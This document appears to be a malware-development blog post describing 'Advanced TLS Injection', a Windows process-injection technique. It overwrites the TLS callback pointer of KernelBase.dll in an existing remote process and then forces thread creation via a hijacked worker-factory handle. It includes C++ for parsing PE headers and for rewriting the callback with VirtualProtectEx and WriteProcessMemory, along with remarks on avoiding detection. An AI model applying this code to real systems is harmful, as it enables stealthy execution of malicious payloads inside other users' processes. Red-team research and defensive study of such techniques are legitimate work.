Payload Execution

Hijacking a remote module's TLS callback to run a payload.

While the finer details of these TLS callbacks aren’t particularly important, we need to understand that each function within the array gets executed by the system each time a new thread is created. However, if a developer chooses not to implement TLS callbacks within their program, the compiled binary will not contain a TLS directory. This is crucial to understand because it was ultimately the limiting factor behind TLS Injection, a technique first publicly demonstrated by the founders of Maldev Academy, Mr. D0x and NULL.

The repository for this code can be found here: https://github.com/Maldev-Academy/RemoteTLSCallbackInjection

The idea behind their technique is fairly simple. First, create a child process in a suspended state using something like CreateProcessA. Then, read through the process’ image memory, and access the TLS directory. Finally, overwrite the first pointer within the callback array to point to a payload, which the attacker would have allocated previously. Once the main thread of the suspended process is resumed, it will run the malicious TLS callback.

This is an excellent technique, but it has two major flaws. Firstly, the executable image the process is created from must already have TLS callbacks registered. If the binary doesn’t have any, the TLS directory won’t exist, which makes the technique impossible. Secondly, the technique restricts you to creating your own process, rather than targeting an existing one.

These are fundamental problems that my variant of the technique fixes. I’ve decided to refer to it as Advanced TLS Injection, and it relies on two things to work. Firstly, we need to understand that TLS callbacks can exist within any PE file, which includes DLLs. TLS callbacks within these DLLs get executed by any threads that become “attached” to them. A thread is considered “attached” to a DLL when it’s created after said DLL is mapped. Luckily, KernelBase.dll fits our needs perfectly, as it contains registered TLS callbacks, and is also a core subsystem DLL that is loaded into virtually every process in Windows.

KernelBase.dll is an easy, reliable target for this kind of technique, and its base address can be located very easily using the Windows snapshot API function, CreateToolhelp32Snapshot.

HANDLE CreateToolhelp32Snapshot(
  _In_ DWORD dwFlags,
  _In_ DWORD th32ProcessID
);

By passing the TH32CS_SNAPMODULE flag as the function’s first parameter and the target PID as the second, we can take a snapshot of every module loaded in that process. Walking the snapshot with Module32First and Module32Next gives us each module’s name and its base address within that process.

Once we’ve located the base address of KernelBase within the remote process, we can copy over its PE headers using a function like ReadProcessMemory, which will get us the offset to its TLS directory.
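To make the header walk concrete, here is a minimal sketch of how the TLS directory entry can be located once the headers are sitting in a local buffer. It is not taken from the repository: the helper names (readAt, findTlsDirectory) are hypothetical, the field offsets are hard-coded from the PE/COFF specification instead of using the Windows headers so that it builds anywhere, and it assumes a little-endian host.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// Offsets and constants from the PE/COFF specification.
constexpr std::size_t   kLfanewOffset      = 0x3C;        // IMAGE_DOS_HEADER::e_lfanew
constexpr std::uint16_t kDosMagic          = 0x5A4D;      // "MZ"
constexpr std::uint32_t kNtSignature       = 0x00004550;  // "PE\0\0"
constexpr std::uint16_t kPe32Magic         = 0x10B;
constexpr std::uint16_t kPe32PlusMagic     = 0x20B;
constexpr std::size_t   kTlsDirectoryIndex = 9;           // IMAGE_DIRECTORY_ENTRY_TLS

// Same layout as IMAGE_DATA_DIRECTORY: an RVA followed by a size.
struct DataDirectory {
    std::uint32_t rva;
    std::uint32_t size;
};

// Hypothetical helper: bounds-checked read of a T at a byte offset.
template <typename T>
std::optional<T> readAt(const std::vector<std::uint8_t>& buf, std::size_t off) {
    if (off > buf.size() || buf.size() - off < sizeof(T)) return std::nullopt;
    T value;
    std::memcpy(&value, buf.data() + off, sizeof(T));
    return value;
}

// Hypothetical helper: returns the TLS data directory entry, or nullopt if the
// headers are malformed or the image has no TLS directory.
std::optional<DataDirectory> findTlsDirectory(const std::vector<std::uint8_t>& headers) {
    auto dosMagic = readAt<std::uint16_t>(headers, 0);
    if (!dosMagic || *dosMagic != kDosMagic) return std::nullopt;

    auto lfanew = readAt<std::uint32_t>(headers, kLfanewOffset);
    if (!lfanew) return std::nullopt;

    auto signature = readAt<std::uint32_t>(headers, *lfanew);
    if (!signature || *signature != kNtSignature) return std::nullopt;

    // The optional header follows the 4-byte signature and 20-byte file header.
    const std::size_t optionalHeader = static_cast<std::size_t>(*lfanew) + 4 + 20;
    auto magic = readAt<std::uint16_t>(headers, optionalHeader);
    if (!magic) return std::nullopt;

    // Offset of DataDirectory[0] inside the optional header differs by format.
    std::size_t directoriesOffset = 0;
    if (*magic == kPe32PlusMagic)  directoriesOffset = 112;
    else if (*magic == kPe32Magic) directoriesOffset = 96;
    else return std::nullopt;

    // NumberOfRvaAndSizes sits immediately before the directory array.
    auto count = readAt<std::uint32_t>(headers, optionalHeader + directoriesOffset - 4);
    if (!count || *count <= kTlsDirectoryIndex) return std::nullopt;

    auto entry = readAt<DataDirectory>(
        headers, optionalHeader + directoriesOffset + kTlsDirectoryIndex * sizeof(DataDirectory));
    if (!entry || entry->rva == 0) return std::nullopt;  // no TLS directory present
    return entry;
}
```

The returned RVA is relative to the module’s base, so adding it to the base address found through the snapshot gives the location of the TLS directory in the remote process. A zero RVA is the "no TLS directory" case described earlier.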

Once we’ve also copied over the remote KernelBase’s TLS directory, we can simply call WriteProcessMemory to change the first pointer in its callback array, found via the directory’s AddressOfCallBacks member.
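It helps to see how the directory and its callback array are laid out before touching them. The sketch below is an illustration only, under a few assumptions: it covers the 64-bit layout, it works on a local copy of the mapped image, and readCallbacks and its parameters are hypothetical names. In a loaded module the directory's fields hold absolute addresses, not RVAs, so the module's load base is subtracted to index into the local copy.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Mirrors the 64-bit IMAGE_TLS_DIRECTORY layout from the PE/COFF specification.
// All four address fields are virtual addresses, not RVAs.
struct TlsDirectory64 {
    std::uint64_t startAddressOfRawData;
    std::uint64_t endAddressOfRawData;
    std::uint64_t addressOfIndex;
    std::uint64_t addressOfCallBacks;  // VA of a null-terminated pointer array
    std::uint32_t sizeOfZeroFill;
    std::uint32_t characteristics;
};
static_assert(sizeof(TlsDirectory64) == 40, "unexpected TLS directory size");

// Hypothetical helper: given a local copy of a mapped image, the address it was
// loaded at, and the RVA of its TLS directory, list the registered callbacks.
std::vector<std::uint64_t> readCallbacks(const std::vector<std::uint8_t>& image,
                                         std::uint64_t loadBase,
                                         std::uint32_t tlsDirectoryRva) {
    std::vector<std::uint64_t> callbacks;

    if (tlsDirectoryRva > image.size() ||
        image.size() - tlsDirectoryRva < sizeof(TlsDirectory64)) {
        return callbacks;  // directory lies outside the copied range
    }

    TlsDirectory64 directory;
    std::memcpy(&directory, image.data() + tlsDirectoryRva, sizeof(directory));

    if (directory.addressOfCallBacks < loadBase) return callbacks;
    std::uint64_t offset = directory.addressOfCallBacks - loadBase;

    // Walk the array until the terminating null entry or the end of the copy.
    while (offset <= image.size() && image.size() - offset >= sizeof(std::uint64_t)) {
        std::uint64_t entry = 0;
        std::memcpy(&entry, image.data() + offset, sizeof(entry));
        if (entry == 0) break;
        callbacks.push_back(entry);
        offset += sizeof(entry);
    }
    return callbacks;
}
```

Because AddressOfCallBacks is already an absolute address inside the target, it can be used directly as the remote address of the first array slot, which is why the snippet that follows passes it straight through.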

// Change protections on the page so we can modify the pointer
if (!VirtualProtectEx(
    targetProcess,
    reinterpret_cast<LPVOID>(pImgTlsDirectory->AddressOfCallBacks), 
    sizeof(void*),
    PAGE_READWRITE, //new protection value
    (PDWORD)&oldProtect)) {
    
    return false;
}

// Change the callback to point to our payload
if (!WriteProcessMemory(
    targetProcess,
    reinterpret_cast<LPVOID>(pImgTlsDirectory->AddressOfCallBacks),
    &remotePayload,
    sizeof(void*),
    nullptr)) {
    
    return false;
}

Note that we’re changing the memory protections to read/write here first, because the page is initially read-only. This isn’t a particularly big deal, as changing protections to something that isn’t executable generally isn’t risky.

The trap is now set, and any new thread created within the remote process will trigger our payload for us. However, waiting around for a new thread to be created isn’t ideal, and is generally unreliable. Thankfully, I came up with a way to reliably trigger the malicious callback instantly, negating this issue.

If you read my previous write-up on exploiting Windows thread pools, you should remember what a worker factory is. It’s a central component of the Windows thread pool architecture, and it manages the creation and termination of threads within the pool. We can acquire a handle to a remote process’ worker factory via Handle Hijacking, a technique I also went over extensively in that write-up. With that handle, we can use the NtSetInformationWorkerFactory syscall to raise the minimum number of threads within the thread pool. If the new minimum is higher than the current number of threads, a new thread will be created.

NTSTATUS NTAPI NtSetInformationWorkerFactory(
    _In_ HANDLE WorkerFactoryHandle,
    _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
    _In_reads_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation,
    _In_ ULONG WorkerFactoryInformationLength
);

In other words, we can utilize this syscall to force the creation of a new thread within the process, which should trigger our malicious TLS callback.

The last thing that should be done is reverting the function pointer in the TLS callback array to its original value. Otherwise, the callback may get triggered more than once, which would cause serious problems in a real engagement. In my repository for this technique, I didn’t do this, mainly because it uses the msfvenom “calc” payload for testing purposes, which kills the process it runs in anyway. Just make sure you take this into consideration if you decide to implement the technique yourself.
